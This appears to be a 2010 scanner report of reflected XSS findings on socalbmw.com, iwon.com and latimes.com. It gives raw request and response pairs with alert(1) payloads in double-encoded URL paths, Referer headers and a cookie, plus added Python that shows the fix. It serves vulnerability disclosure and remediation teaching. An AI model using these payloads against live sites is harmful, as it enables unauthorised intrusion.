Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1c1f%253cscript%253ealert%25281%2529%253c%252fscript%253e0a4eaefdc5 was submitted in the REST URL parameter 1. This input was echoed as b1c1f<script>alert(1)</script>0a4eaefdc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /favicon.icob1c1f%253cscript%253ealert%25281%2529%253c%252fscript%253e0a4eaefdc5 HTTP/1.1
Host: www.socalbmw.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1292179244101; s_sq=%5B%5BB%5D%5D; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:52:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 68cba%253cscript%253ealert%25281%2529%253c%252fscript%253e21c48b81764 was submitted in the REST URL parameter 2. This input was echoed as 68cba<script>alert(1)</script>21c48b81764 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /finance/leaseoffers.aspx68cba%253cscript%253ealert%25281%2529%253c%252fscript%253e21c48b81764 HTTP/1.1
Host: www.socalbmw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:52:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
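Every socalbmw.com finding above reports the same root cause: the web server URL-decodes the path once, a block-list filter then looks for characters such as < and >, and a custom canonicalisation step decodes a second time, so %253c survives the filter and becomes < only after it. The following Python is an added example written for this page, not the site's code; it models that pipeline next to the remediation the findings describe (decode once, validate the canonical value, encode on output). The filter, the slug allow-list and the function names are assumptions, and the payload is the one from the 328iconvertible finding.

```python
"""Double-URL-decoding bypass and its fix (added example, not the site's code)."""
import html
import re
from urllib.parse import unquote

# Characters the (hypothetical) block-list filter rejects.
BLOCKED_CHARS = frozenset("<>")

# Allow-list for the model slug in the path, e.g. "328iconvertible".
# Hypothetical; tune to what the application actually accepts.
SLUG_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_render(raw_segment: str) -> str:
    """Model of the broken pipeline: decode, block-list, decode again, echo raw."""
    once = unquote(raw_segment)              # web server's single decode: %253c -> %3c
    if any(c in BLOCKED_CHARS for c in once):
        return "<p>Invalid model</p>"        # fires only on a literal '<' or '>'
    twice = unquote(once)                    # custom canonicalisation: %3c -> '<' (the bug)
    return f"<p>Special offers for {twice}</p>"   # no output encoding


def encode_for_html(value: str) -> str:
    """Encode for HTML text and double-quoted attribute contexts."""
    return html.escape(value, quote=True)


def fixed_render(raw_segment: str) -> str:
    """Decode once, validate the canonical value, encode on output."""
    canonical = unquote(raw_segment)         # one decode: the value is now canonical
    if not SLUG_RE.fullmatch(canonical):     # validation runs on the canonical form
        return "<p>Invalid model</p>"
    # Defence in depth: encode even though the allow-list excludes markup.
    return f"<p>Special offers for {encode_for_html(canonical)}</p>"


# Payloads from the report: double-encoded (bypasses) and single-encoded (blocked).
PAYLOAD_DOUBLE = "5a2e8%253cscript%253ealert%25281%2529%253c%252fscript%253eb356b911f22"
PAYLOAD_SINGLE = "5a2e8%3cscript%3ealert%281%29%3c%2fscript%3eb356b911f22"

if __name__ == "__main__":
    print(vulnerable_render(PAYLOAD_SINGLE))   # filter catches the literal '<'
    print(vulnerable_render(PAYLOAD_DOUBLE))   # <script>alert(1)</script> reaches the page
    print(fixed_render(PAYLOAD_DOUBLE))        # rejected: '%' is not in the allow-list
    print(fixed_render("328iconvertible"))     # a normal slug renders as before
```

The second decode is what turns a harmless %3c into markup; removing it, or at least running validation after it, closes the bypass, and encoding on output covers whatever the validation misses.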
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 508fe'-alert(1)-'24b57513d08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dl/index.jhtml HTTP/1.1
Host: www.iwon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=508fe'-alert(1)-'24b57513d08
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:54:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Content-Language: en
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: ltm=2399230474.20480.0000; expires=Sun, 26-Dec-2010 18:54:36 GMT; path=/
Content-Length: 36688

var sUrl='/dl/tpp.jhtml?w=l&vpartner=ZLYYYYYY5QUS&product=iwon&siteid=&pg=&theme=>rk=&ef_id=&sub=&ref=http://www.google.com/search?hl=en&q=508fe'-alert(1)-'24b57513d08&uVal='+uid+'&verVal='+ver;
var sFrameHTML='<iframe id="frameTTP" src="'+sUrl+'" width="1" height="1"> ...[SNIP]...
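In the iwon.com finding above the Referer value is concatenated straight into a single-quoted JavaScript string, so one quote character ends the literal and whatever follows is parsed as code. The following Python is an added example, not the site's code: it models that concatenation beside a server-side encoder that emits a JavaScript string literal which cannot leave its context, and percent-encodes the value first because it is used as a query-string component. The function names and the simplified sUrl line are assumptions; the payload is the one from the report.

```python
"""Encoding for the JavaScript string context (added example, not the site's code)."""
import json
from urllib.parse import quote


def js_string_literal(value: str) -> str:
    """Return a double-quoted JavaScript string literal safe inside a <script> block.

    json.dumps with its default ensure_ascii=True escapes quotes, backslashes,
    control characters and every non-ASCII character, which covers the
    U+2028/U+2029 line terminators. '<', '>' and '&' are escaped as well so the
    literal can never contain '</script' or '<!--', which the HTML parser acts
    on before the JavaScript engine ever sees the string.
    """
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def vulnerable_script(referer: str) -> str:
    """Raw concatenation into a single-quoted literal: the reported behaviour."""
    return "var sUrl='/dl/tpp.jhtml?ref=" + referer + "&uVal='+uid;"


def fixed_script(referer: str) -> str:
    """Percent-encode the query-string component, then emit it as a safe JS literal."""
    component = quote(referer, safe="")      # ' ( ) & = all become %XX
    return ("var sUrl='/dl/tpp.jhtml?ref='+" + js_string_literal(component)
            + "+'&uVal='+uid;")


# Referer value from the report (constructed input for the functions above).
PAYLOAD = "http://www.google.com/search?hl=en&q=508fe'-alert(1)-'24b57513d08"

if __name__ == "__main__":
    print(vulnerable_script(PAYLOAD))   # the quote in the payload terminates the literal
    print(fixed_script(PAYLOAD))        # the value stays inside one literal
```

Escaping only the quote character is not enough in this context: the HTML parser tokenises the script element before the JavaScript engine runs, so a literal that contains </script closes the block regardless of quoting, which is why the encoder also replaces <, > and &.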
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5fc"><script>alert(1)</script>293267da7bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /dl/index.jhtml?spid=473&spu=true&partner=ZLxdm003 HTTP/1.1
Host: www.iwon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9d5fc"><script>alert(1)</script>293267da7bc
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:54:38 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Content-Language: en
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: ltm=2516670986.20480.0000; expires=Sun, 26-Dec-2010 18:54:38 GMT; path=/
Content-Length: 41499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f07f"><script>alert(1)</script>18a7cb5084c was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /services/site/joinus/ HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=1f07f"><script>alert(1)</script>18a7cb5084c; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s28z2n1
Expires: Sun, 12 Dec 2010 18:55:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110994

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a3e"><script>alert(1)</script>6642ae7ea7c was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request

GET /services/site/la-privacy,0,3125046.story HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=25a3e"><script>alert(1)</script>6642ae7ea7c; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s29z2n1
Last-Modified: Sun, 12 Dec 2010 18:55:32 GMT
Expires: Sun, 12 Dec 2010 18:55:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126756

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<ht
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/service/site;25a3e"><script>alert(1)</script>6642ae7ea7c;ptype=s;slug=la-privacy;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;u=http://www.latimes.com/services/site/la-privacy,0,3125046.story;ord=39896525?" type="text/javascript">
...[SNIP]...
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970a1"><script>alert(1)</script>faebd9b1fbf was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request

GET /services/site/la-reprint-request-splash,0,6731163.htmlstory HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=970a1"><script>alert(1)</script>faebd9b1fbf; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s28z1n1
Last-Modified: Sun, 12 Dec 2010 18:55:56 GMT
Expires: Sun, 12 Dec 2010 18:55:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<ht
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/service/site;970a1"><script>alert(1)</script>faebd9b1fbf;ptype=s;slug=la-reprint-request-splash;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;u=http://www.latimes.com/services/site/la-reprint-request-splash,0,6731163.htmlstory;ord=90936428?" type="text/javascript"
...[SNIP]...
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0883"><script>alert(1)</script>c9447c03e19 was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request

GET /services/site/lat-terms,0,6713384.htmlstory HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=f0883"><script>alert(1)</script>c9447c03e19; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s27z1n1
Last-Modified: Sun, 12 Dec 2010 18:55:57 GMT
Expires: Sun, 12 Dec 2010 18:55:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135760

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "ht
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/service/site;f0883"><script>alert(1)</script>c9447c03e19;ptype=s;slug=lat-terms;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;ca=PatentsCopyrightsandTrademarks;en=Chicago;at=PatentsCopyrightsandTrademarks;at=InternationalRelations;at=CrimeLawandJustice;at=EconomyB
...[SNIP]...
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92002"><script>alert(1)</script>f4c9bfd241d was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request

GET /services/site/mobile/ HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; 